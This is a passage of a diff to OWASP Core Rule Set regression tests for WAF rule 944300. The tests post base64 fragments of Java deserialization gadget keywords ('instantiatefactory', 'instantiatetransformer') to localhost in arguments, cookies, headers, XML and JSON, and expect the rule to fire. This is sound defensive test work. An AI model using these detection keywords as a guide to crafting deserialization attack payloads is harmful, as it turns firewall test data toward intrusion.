"application/x-www-form-urlencoded" + Cookie: BpbnN0YW50aWF0ZWZhY3Rvcnk=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 159 desc: "Request header test includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - 
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: BpbnN0YW50aWF0ZWZhY3Rvcnk - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-160 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BpbnN0YW50aWF0ZWZhY3Rvcnk + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 160 desc: "XML attribute value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-161 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 161 desc: "XML element value includes keyword 
BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BpbnN0YW50aWF0ZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-162 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZWZhY3Rvcnk" + output: + log: + expect_ids: [944300] + - test_id: 162 desc: "Nested XML element value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BpbnN0YW50aWF0ZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-163 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: 
"BpbnN0YW50aWF0ZWZhY3Rvcnk" + output: + log: + expect_ids: [944300] + - test_id: 163 desc: "Content-Type text/plain includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=BpbnN0YW50aWF0ZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-164 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=BpbnN0YW50aWF0ZWZhY3Rvcnk" + output: + log: + expect_ids: [944300] + - test_id: 164 desc: "Content-Type application/json arg value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"BpbnN0YW50aWF0ZWZhY3Rvcnk\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-165 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"BpbnN0YW50aWF0ZWZhY3Rvcnk\"}" + output: + log: + expect_ids: [944300] + - test_id: 165 desc: "Content-Type application/json arg name includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"BpbnN0YW50aWF0ZWZhY3Rvcnk\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-166 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"BpbnN0YW50aWF0ZWZhY3Rvcnk\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 166 desc: "Argument test includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-167 + - input: + 
dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + output: + log: + expect_ids: [944300] + - test_id: 167 desc: "Argument name includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-168 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg=test" + output: + log: + expect_ids: [944300] + - test_id: 168 desc: "Cookie test includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - 
Content-Type: "application/x-www-form-urlencoded" - Cookie: test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-169 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 169 desc: "Cookie name includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-170 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 170 desc: "Request header test includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: 
"127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-171 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 171 desc: "XML attribute value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-172 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + 
log: + expect_ids: [944300] + - test_id: 172 desc: "XML element value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-173 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + output: + log: + expect_ids: [944300] + - test_id: 173 desc: "Nested XML element value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-174 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: 
"en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + output: + log: + expect_ids: [944300] + - test_id: 174 desc: "Content-Type text/plain includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-175 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + output: + log: + expect_ids: [944300] + - test_id: 175 desc: "Content-Type application/json arg value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-176 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: 
"OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg\"}" + output: + log: + expect_ids: [944300] + - test_id: 176 desc: "Content-Type application/json arg name includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-177 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 177 desc: "Argument test includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" 
- version: "HTTP/1.0" - data: "test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-178 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + output: + log: + expect_ids: [944300] + - test_id: 178 desc: "Argument name includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-179 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI=test" + output: + log: + expect_ids: [944300] + - test_id: 179 desc: "Cookie test includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-180 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 180 desc: "Cookie name includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Gluc3RhbnRpYXRldHJhbnNmb3JtZXI=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-181 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Gluc3RhbnRpYXRldHJhbnNmb3JtZXI=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + 
output: + log: + expect_ids: [944300] + - test_id: 181 desc: "Request header test includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Gluc3RhbnRpYXRldHJhbnNmb3JtZXI - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-182 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Gluc3RhbnRpYXRldHJhbnNmb3JtZXI + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 182 desc: "XML attribute value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-183 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: 
"gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 183 desc: "XML element value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-184 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + output: + log: + expect_ids: [944300] + - test_id: 184 desc: "Nested XML element value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: 